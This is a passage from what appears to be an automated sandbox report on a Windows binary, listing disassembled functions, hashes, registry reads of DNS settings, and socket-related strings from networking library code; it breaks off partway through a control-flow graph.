                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                                  • API String ID: 3358416759-2430778319
                                                  • Opcode ID: d031358327d62094efb27e2a8a5a0870f94c7e18b1f1478b196ede08bec14d9d
                                                  • Instruction ID: 9a39732d106c9a3983e4c5bde924468ada26ad1eddb254b300c8e2b779d84bc3
                                                  • Opcode Fuzzy Hash: d031358327d62094efb27e2a8a5a0870f94c7e18b1f1478b196ede08bec14d9d
                                                  • Instruction Fuzzy Hash: A9C16071604309DFE714DF24C884A7A7BE2FF88304F158968EA458B3A1EB39ED45CB81
                                                  Function 00546FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6ee8be946c0275690d6c21a591340d451c13f229f6afb23fe0808844530ade6
                                                  • Instruction ID: 0ad4e4aa58dbd1fff085f12766dbaf25af9fc08d77369bfb5fb53de19e255c73
                                                  • Opcode Fuzzy Hash: f6ee8be946c0275690d6c21a591340d451c13f229f6afb23fe0808844530ade6
                                                  • Instruction Fuzzy Hash: 4D91F23060D34E8BD7358A2888847FB7AD9FFC8368F149B2CE8A8431D4EB759C40D681
                                                  Function 005FA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,005E712E,?,?,?,00001001,00000000), ref: 005FA90D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: recvfrom
                                                  • String ID:
                                                  • API String ID: 846543921-0
                                                  • Opcode ID: 49cbef263b2362c17b4f98668aa269960608c7c29f056254c2f521b6d9caf50e
                                                  • Instruction ID: 3ffeae82db4188309087b8b8da00bbc867b024ffc657f54cd22204c76836bbef
                                                  • Opcode Fuzzy Hash: 49cbef263b2362c17b4f98668aa269960608c7c29f056254c2f521b6d9caf50e
                                                  • Instruction Fuzzy Hash: 99F049B5108308AFD2109A01DD48D7BBBEDFBC9754F05896DF94C132118270AE108AB2
                                                  Function 005EA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005EAA19
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005EAA4C
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 005EAA97
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005EAAE9
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005EAB30
                                                  • RegCloseKey.KERNELBASE(?), ref: 005EAB6A
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 005EAB82
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 005EAC46
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 005EAD0A
                                                  • RegEnumKeyExA.KERNELBASE ref: 005EAD8D
                                                  • RegCloseKey.KERNELBASE(?), ref: 005EADD9
                                                  • RegEnumKeyExA.KERNELBASE ref: 005EAE08
                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 005EAE2A
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005EAE54
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005EAF63
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005EAFB2
                                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 005EB072
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$Open$CloseEnum
                                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                  • API String ID: 4217438148-1047472027
                                                  • Opcode ID: e4be777b5b2c6711bc9a1d21101c47a949b87320f1f9912d30eeb8ae2133d4ec
                                                  • Instruction ID: 60dbaa484d1eccc11e72e6d77463b75ebd4f77a42c83bb450b06dd199ddb5975
                                                  • Opcode Fuzzy Hash: e4be777b5b2c6711bc9a1d21101c47a949b87320f1f9912d30eeb8ae2133d4ec
                                                  • Instruction Fuzzy Hash: D572B0B1608341ABE7249B35CC81F6B7BE8BF85740F144829F985D72A1EB71E944CB63
                                                  Function 0056A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0056A831
                                                  Strings
                                                  • cf-socket.c, xrefs: 0056A5CD, 0056A735
                                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0056A6CE
                                                  • Local Interface %s is ip %s using address family %i, xrefs: 0056AE60
                                                  • bind failed with errno %d: %s, xrefs: 0056B080
                                                  • @, xrefs: 0056AC42
                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0056ADAC
                                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0056AD0A
                                                  • Trying %s:%d..., xrefs: 0056A7C2, 0056A7DE
                                                  • Could not set TCP_NODELAY: %s, xrefs: 0056A871
                                                  • @, xrefs: 0056A8F4
                                                  • Trying [%s]:%d..., xrefs: 0056A689
                                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0056AE1F
                                                  • Bind to local port %d failed, trying next, xrefs: 0056AFE5
                                                  • Local port: %hu, xrefs: 0056AF28
                                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0056A796
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3981526788-2373386790
                                                  • Opcode ID: abcb563775a6162e7873951f1450423269569bc3eb8ea511a0a0e00e1bec1fa7
                                                  • Instruction ID: 7f0205b0f996ce3b43bf5f260f21c372ef2448eae65d5e0b0519dee33d1d1fe7
                                                  • Opcode Fuzzy Hash: abcb563775a6162e7873951f1450423269569bc3eb8ea511a0a0e00e1bec1fa7
                                                  • Instruction Fuzzy Hash: 2162D171508341ABE7218F24C846BABBBF4FF95314F044929F988A7292E771E945CF93
                                                  Function 005F9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 973 5f9740-5f975b 974 5f975d-5f9768 call 5f78a0 973->974 975 5f9780-5f9782 973->975 982 5f976e-5f9770 974->982 983 5f99bb-5f99c0 974->983 976 5f9788-5f97a0 call 8b8e00 call 5f78a0 975->976 977 5f9914-5f994e call 8b8b70 RegOpenKeyExA 975->977 976->983 986 5f97a6-5f97c5 976->986 990 5f995a-5f9992 RegQueryValueExA RegCloseKey call 8b8b98 977->990 991 5f9950-5f9955 977->991 982->986 987 5f9772-5f977e 982->987 988 5f9a0c-5f9a15 983->988 997 5f9827-5f9833 986->997 998 5f97c7-5f97e0 986->998 987->976 999 5f9997-5f99b5 call 5f78a0 990->999 991->988 1000 5f985f-5f9872 call 5f5ca0 997->1000 1001 5f9835-5f985c call 5ee2b0 * 2 997->1001 1002 5f97f6-5f9809 998->1002 1003 5f97e2-5f97f3 call 8b8b50 998->1003 999->983 999->986 1013 5f9878-5f987d call 5f77b0 1000->1013 1014 5f99f0 1000->1014 1001->1000 1002->997 1012 5f980b-5f9810 1002->1012 1003->1002 1012->997 1017 5f9812-5f9822 1012->1017 1021 5f9882-5f9889 1013->1021 1016 5f99f5-5f99fb call 5f5d00 1014->1016 1027 5f99fe-5f9a09 1016->1027 1017->988 1021->1016 1026 5f988f-5f989b call 5e4fe0 1021->1026 1026->1014 1032 5f98a1-5f98c3 call 8b8b50 call 5f78a0 1026->1032 1027->988 1037 5f98c9-5f98db call 5ee2d0 1032->1037 1038 5f99c2-5f99ed call 5ee2b0 * 2 1032->1038 1037->1038 1042 5f98e1-5f98f0 call 5ee2d0 1037->1042 1038->1014 1042->1038 1048 5f98f6-5f9905 call 5f63f0 1042->1048 1053 5f990b-5f990f 1048->1053 1054 5f9f66-5f9f7f call 5f5d00 1048->1054 1056 5f9a3f-5f9a5a call 5f6740 call 5f63f0 1053->1056 1054->1027 1056->1054 1062 5f9a60-5f9a6e call 5f6d60 1056->1062 1065 5f9a1f-5f9a39 call 5f6840 call 5f63f0 1062->1065 1066 5f9a70-5f9a94 call 5f6200 call 5f67e0 call 5f6320 1062->1066 1065->1054 1065->1056 1077 5f9a16-5f9a19 1066->1077 1078 5f9a96-5f9ac6 call 5ed120 1066->1078 1077->1065 1079 5f9fc1 1077->1079 1083 5f9ac8-5f9adb call 5ed120 1078->1083 1084 5f9ae1-5f9af7 call 5ed190 1078->1084 1081 5f9fc5-5f9ffd call 5f5d00 call 5ee2b0 * 2 1079->1081 1081->1027 1083->1065 1083->1084 1084->1065 1091 5f9afd-5f9b09 call 5e4fe0 1084->1091 1091->1079 1097 5f9b0f-5f9b29 call 5ee730 1091->1097 1103 5f9b2f-5f9b3a call 5f78a0 1097->1103 1104 5f9f84-5f9f88 1097->1104 1103->1104 1111 5f9b40-5f9b54 call 5ee760 1103->1111 1105 5f9f95-5f9f99 1104->1105 1107 5f9f9b-5f9f9e 1105->1107 1108 5f9fa0-5f9fb6 call 5eebf0 * 2 1105->1108 1107->1079 1107->1108 1120 5f9fb7-5f9fbe 1108->1120 1116 5f9f8a-5f9f92 1111->1116 1117 5f9b5a-5f9b6e call 5ee730 1111->1117 1116->1105 1123 5f9b8c-5f9b97 call 5f63f0 1117->1123 1124 5f9b70-5fa004 1117->1124 1120->1079 1132 5f9b9d-5f9bbf call 5f6740 call 5f63f0 1123->1132 1133 5f9c9a-5f9cab call 5eea00 1123->1133 1128 5fa015-5fa01d 1124->1128 1130 5fa01f-5fa022 1128->1130 1131 5fa024-5fa045 call 5eebf0 * 2 1128->1131 1130->1081 1130->1131 1131->1081 1132->1133 1150 5f9bc5-5f9bda call 5f6d60 1132->1150 1140 5f9f31-5f9f35 1133->1140 1141 5f9cb1-5f9ccd call 5eea00 call 5ee960 1133->1141 1146 5f9f37-5f9f3a 1140->1146 1147 5f9f40-5f9f61 call 5eebf0 * 2 1140->1147 1161 5f9ccf 1141->1161 1162 5f9cfd-5f9d0e call 5ee960 1141->1162 1146->1065 1146->1147 1147->1065 1150->1133 1160 5f9be0-5f9bf4 call 5f6200 call 5f67e0 1150->1160 1160->1133 1180 5f9bfa-5f9c0b call 5f6320 1160->1180 1165 5f9cd1-5f9cec call 5ee9f0 call 5ee4a0 1161->1165 1170 5f9d53-5f9d55 1162->1170 1171 5f9d10 1162->1171 1182 5f9cee-5f9cfb call 5ee9d0 1165->1182 1183 5f9d47-5f9d51 1165->1183 1174 5f9e69-5f9e8e call 5eea40 call 5ee440 1170->1174 1175 5f9d12-5f9d2d call 5ee9f0 call 5ee4a0 1171->1175 1198 5f9e94-5f9eaa call 5ee3c0 1174->1198 1199 5f9e90-5f9e92 1174->1199 1202 5f9d2f-5f9d3c call 5ee9d0 1175->1202 1203 5f9d5a-5f9d6f call 5ee960 1175->1203 1196 5f9b75-5f9b86 call 5eea00 1180->1196 1197 5f9c11-5f9c1c call 5f7b70 1180->1197 1182->1162 1182->1165 1188 5f9dca-5f9ddb call 5ee960 1183->1188 1208 5f9e2e-5f9e36 1188->1208 1209 5f9ddd-5f9ddf 1188->1209 1196->1123 1218 5f9f2d 1196->1218 1197->1123 1221 5f9c22-5f9c33 call 5ee960 1197->1221 1228 5fa04a-5fa04c 1198->1228 1229 5f9eb0-5f9eb1 1198->1229 1206 5f9eb3-5f9ec4 call 5ee9c0 1199->1206 1202->1175 1231 5f9d3e-5f9d42 1202->1231 1224 5f9dc2 1203->1224 1225 5f9d71-5f9d73 1203->1225 1206->1065 1238 5f9eca-5f9ed0 1206->1238 1214 5f9e3d-5f9e5b call 5eebf0 * 2 1208->1214 1215 5f9e38-5f9e3b 1208->1215 1217 5f9e06-5f9e21 call 5ee9f0 call 5ee4a0 1209->1217 1226 5f9e5e-5f9e67 1214->1226 1215->1214 1215->1226 1253 5f9e23-5f9e2c call 5eeac0 1217->1253 1254 5f9de1-5f9dee call 5eec80 1217->1254 1218->1140 1240 5f9c66-5f9c75 call 5f78a0 1221->1240 1241 5f9c35 1221->1241 1224->1188 1236 5f9d9a-5f9db5 call 5ee9f0 call 5ee4a0 1225->1236 1226->1174 1226->1206 1234 5fa04e-5fa051 1228->1234 1235 5fa057-5fa070 call 5eebf0 * 2 1228->1235 1229->1206 1231->1174 1234->1079 1234->1235 1235->1120 1269 5f9db7-5f9dc0 call 5eeac0 1236->1269 1270 5f9d75-5f9d82 call 5eec80 1236->1270 1245 5f9ee5-5f9ef2 call 5ee9f0 1238->1245 1266 5f9c7b-5f9c8f call 5ee7c0 1240->1266 1267 5fa011 1240->1267 1247 5f9c37-5f9c51 call 5ee9f0 1241->1247 1245->1065 1263 5f9ef8-5f9f0e call 5ee440 1245->1263 1247->1123 1284 5f9c57-5f9c64 call 5ee9d0 1247->1284 1278 5f9df1-5f9e04 call 5ee960 1253->1278 1254->1278 1285 5f9ed2-5f9edf call 5ee9e0 1263->1285 1286 5f9f10-5f9f26 call 5ee3c0 1263->1286 1266->1123 1281 5f9c95-5fa00e 1266->1281 1267->1128 1290 5f9d85-5f9d98 call 5ee960 1269->1290 1270->1290 1278->1208 1278->1217 1281->1267 1284->1240 1284->1247 1285->1065 1285->1245 1286->1285 1300 5f9f28 1286->1300 1290->1224 1290->1236 1300->1079
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005F9946
                                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 005F9974
                                                  • RegCloseKey.KERNELBASE(?), ref: 005F998B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                  • API String ID: 3677997916-615551945
                                                  • Opcode ID: d7971e50c218cc1b959db03ea66f1b191e7daccf9d71ba3ed0a9e9f9d2849a75
                                                  • Instruction ID: 715c8dc51c15dce212d51bfce48c9bc846422121f9c10cadadf6193cbd0881d5
                                                  • Opcode Fuzzy Hash: d7971e50c218cc1b959db03ea66f1b191e7daccf9d71ba3ed0a9e9f9d2849a75
                                                  • Instruction Fuzzy Hash: 8332C7B5900646ABEB11AB21AC46B3B7ED9BF84314F084834FA49D7263F725ED14C793
                                                  Function 00568B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1404 568b50-568b69 1405 568be6 1404->1405 1406 568b6b-568b74 1404->1406 1407 568be9 1405->1407 1408 568b76-568b8d 1406->1408 1409 568beb-568bf2 1406->1409 1407->1409 1410 568bf3-568bfe call 56a550 1408->1410 1411 568b8f-568ba7 call 546e40 1408->1411 1416 568de4-568def 1410->1416 1417 568c04-568c08 1410->1417 1418 568bad-568baf 1411->1418 1419 568cd9-568d16 SleepEx 1411->1419 1422 568df5-568e19 call 56a150 1416->1422 1423 568e8c-568e95 1416->1423 1420 568c0e-568c1d 1417->1420 1421 568dbd-568dc3 1417->1421 1424 568ca6-568cb0 1418->1424 1425 568bb5-568bb9 1418->1425 1440 568d22 1419->1440 1441 568d18-568d20 1419->1441 1428 568c35-568c48 call 56a150 1420->1428 1429 568c1f-568c30 connect 1420->1429 1421->1407 1462 568e1b-568e26 1422->1462 1463 568e88 1422->1463 1426 568e97-568e9c 1423->1426 1427 568f00-568f06 1423->1427 1424->1419 1430 568cb2-568cb8 1424->1430 1425->1409 1432 568bbb-568bc2 1425->1432 1434 568e9e-568eb6 call 542a00 1426->1434 1435 568edf-568eef call 5378b0 1426->1435 1427->1409 1461 568c4d-568c4f 1428->1461 1429->1428 1436 568cbe-568cd4 call 56b180 1430->1436 1437 568ddc-568dde 1430->1437 1432->1409 1439 568bc4-568bcc 1432->1439 1434->1435 1460 568eb8-568edd call 543410 * 2 1434->1460 1458 568ef2-568efc 1435->1458 1436->1416 1437->1407 1437->1416 1447 568bd4-568bda 1439->1447 1448 568bce-568bd2 1439->1448 1443 568d26-568d39 1440->1443 1441->1443 1451 568d43-568d61 call 54d8c0 call 56a150 1443->1451 1452 568d3b-568d3d 1443->1452 1447->1409 1457 568bdc-568be1 1447->1457 1448->1409 1448->1447 1481 568d66-568d74 1451->1481 1452->1437 1452->1451 1464 568dac-568db8 call 5750a0 1457->1464 1458->1427 1460->1458 1468 568c51-568c58 1461->1468 1469 568c8e-568c93 1461->1469 1470 568e2e-568e85 call 54d090 call 574fd0 1462->1470 1471 568e28-568e2c 1462->1471 1463->1423 1464->1409 1468->1469 1478 568c5a-568c62 1468->1478 1474 